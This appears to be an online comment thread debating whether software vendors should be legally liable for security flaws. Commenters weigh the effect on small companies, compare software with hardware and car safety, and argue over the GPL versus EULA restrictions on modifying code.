We have all seen that the only people/corporations that can successfully dodge litigation are those with enough money to throw enough lawyers at the problem. A law like this would basically guarantee Microsoft a future with little to no competition. Small companies that do not have the financial resources to defend themselves against lawsuits that this new law would allow would die. Microsoft would be able to defend themselves just because they have the money to do so, not because their software is better.
Let the market decide! Let the people choose the software that is most secure! A law like this will not help consumers. It will only kill off the small companies and individuals who are innovating and trying to give people choices!
Ask any pharmaceutical or biotech company what happens when one of their products fails and someone is injured. They'll tell you oftentimes there are criminal as well as civil penalties. If Ford had to make a safe Pinto, why shouldn't software vendors be forced to make secure software?
Many will argue that bad software isn't life threatening, and therefore doesn't require stiff penalties. I say baloney! If the firmware that controls the hydraulic systems on an aircraft fails in flight you probably won't survive. If your database on your e-commerce site gets hacked due to a "buffer overflow" error, and all your credit cards get out on the web, shouldn't someone be held liable for the damages... or are we going to let the insurance industry just mop up the damage and pay for it with higher premiums?
There has to be some accountability for negligent behavior.
-ted
Now when you install my software, it will disable all your I/O -- ethernet, serial, CD, as well as every other piece of software on the system. If you want to re-enable these, go ahead, but that's an unsupported configuration and will void the warranty.
-B
Not that this wasn't entirely predictable.
It seems that most "good" applications Microsoft has their name on are purchased from someone else.
Internet Explorer, Age of Empires, FrontPage, Word's proofing tools, ... go read the credits.
It's about time software people are subject to the same rigor that hardware people have to deal with. I've worked in hardware. It always seems like hardware is held to a much higher degree of perfection than software.
The screw is too long? You're fired!
The software fucks up in mind-bogglingly STUPID ways? You're a manager!
Remember the Pentium bug? Most people could have cared less about such an obscure function. Yet Intel got a lot of bad press for it and had to replace lots of chips.
If the hardware is not 100% right away, people flip out. If the software crashes all the time, hey just reinstall it.
This is totally unfair to hardware people.
It doesn't matter how many valid arguments are presented, the law makers here in the USA have consistently exposed their technological ignorance by passing laws against the public good, and that are only in the interest of companies that paid for them.
You may be right, but here that's not enough.
they don't spell it out like your mom does
like when your mom tells you to take your hands out of yer pants when yer havin yer little see eye ohhh fantasy?
I thought America was the home of the free! Don't get me wrong, I'm all for more secure software, and I think open source is one of the best ways to get this. American companies should be free to do what they want (within reason of course), and this includes making insecure and overpriced software. It is the consumer's job to distinguish between something good and something crappy, and we have security experts to help them make that distinction.
We want to destroy the DMCA that restricts our freedom of speech, and yet we want to RESTRICT companies from doing what they want. This sounds hypocritical to me.
We seldom regret saying too little but often regret saying too much.
I think the most amusing part of the article was this:
Even the animated paperclip that acts as a helper in some Microsoft software can be compromised and turned against the computer it is being used on.
NO! Clippy! What are you doing?!
"Anonymous cowards are just K-whores afraid of their accounts being modded down." - Bob the O (me)
The more important question is: What will this mean for Microsoft? Their operating systems are about as secure as a door with a broken lock.
[insert witty comment here]
Not true, /. also covers this hole sometimes.
- Kaos games and encryption systems developer
I'm programming an operating system which is made on the basis of usefulness.
Fortunately, I'm in New Zealand, so I can write: encryption which is better than US military spec, illegal in the USA, UK, Russia, France, China and other places where freedom is dead.
programs that may mutate over time.
programs that haven't been tested.
programs that don't really crash like windows.
And I can say get stuffed to anyone who wants to apply foreign law to my products.
- Kaos games and encryption systems developer
I actually am being censored by my government. I am classed as an economic threat and a potential terrorist by GCSB.govt.nz
Most of my life is global, I want to release software that has encryption which is illegal in the USA, UK, France, Russia & China.
Allowing more censorship is not a good idea.
Try ordering from a country which is only known for Lord of the Rings.
I can ignore national borders because there is no border to NZ or Australia.
Australia is my second country, it only has state borders and I have never crossed a national border.
- Kaos games and encryption systems developer
This really is such a bad idea it's not even funny. Who can afford to have insecure software and jack up their prices to pay for it? Certainly not any small growing shop. The cost of one serious incident could easily put a small company out of business. And this is supposed to make software more secure by turning it over to large corporate entities, many of whom have dubious track records on security?
You get not what you pay for, but what you sign for in your support contract. If you don't dictate the terms of the contract, then vote with your money on a vendor's security record.
I'm not following your logic at all. How did you get from modifying the source of a program vs. hacking the executable to GPL issues? To wit, the original discussion was about modifying a program your company uses. My point was that altering OSS was different from hacking Microsoft because you're not legally allowed to hack the .EXEs, but you're legally allowed to monkey with OSS. The GPL in this case would only apply to redistributed code, not "internal, proprietary software development" (your words). And while RMS and Co. could lay on a lawsuit charging you with pilfering GPL code within a program you sell, they'd have to prove it just like anyone else who wants to sue you, so there's no larger risk of litigation than from any code jockey you ever come in contact with.
> Of course all code isn't GPLd...but that which is represents a similar risk to the EULA.
Not at all. They're different animals, with different situations. As stated above, the GPL applies only to redistributed code. If I get a copy of Red Hat Linux and munge the kernel code to run faster on my local Frankensystem 2002, but I don't redistribute that code outside my business, the GPL never applies. Hacking WINWORD.EXE is always, under every circumstance, illegal, even if I then don't even run the modified executable. Just changing it is a violation.
Virg
For the first 5 (or 6) years that Saturn automobiles were sold in the USA, they could be (and were) hot-wired with merely a pair of scissors. Cops knew it, Saturn knew it, the insurance industry knew it, teens who went for joy rides knew it. Folks who owned Saturn automobiles never learned it until theirs was taken on a joy ride.
Should Saturn have disclosed to its customers and potential customers that the lock on the steering wheel was inadequate? That the same lock was incapable of keeping even casual thieves out? That they knew the lock was deficient and continued to produce cars with the defective locks? I think so. In many countries, companies that do not provide reasonable theft-preventative measures are liable for the thefts.
How does the fourth amendment apply?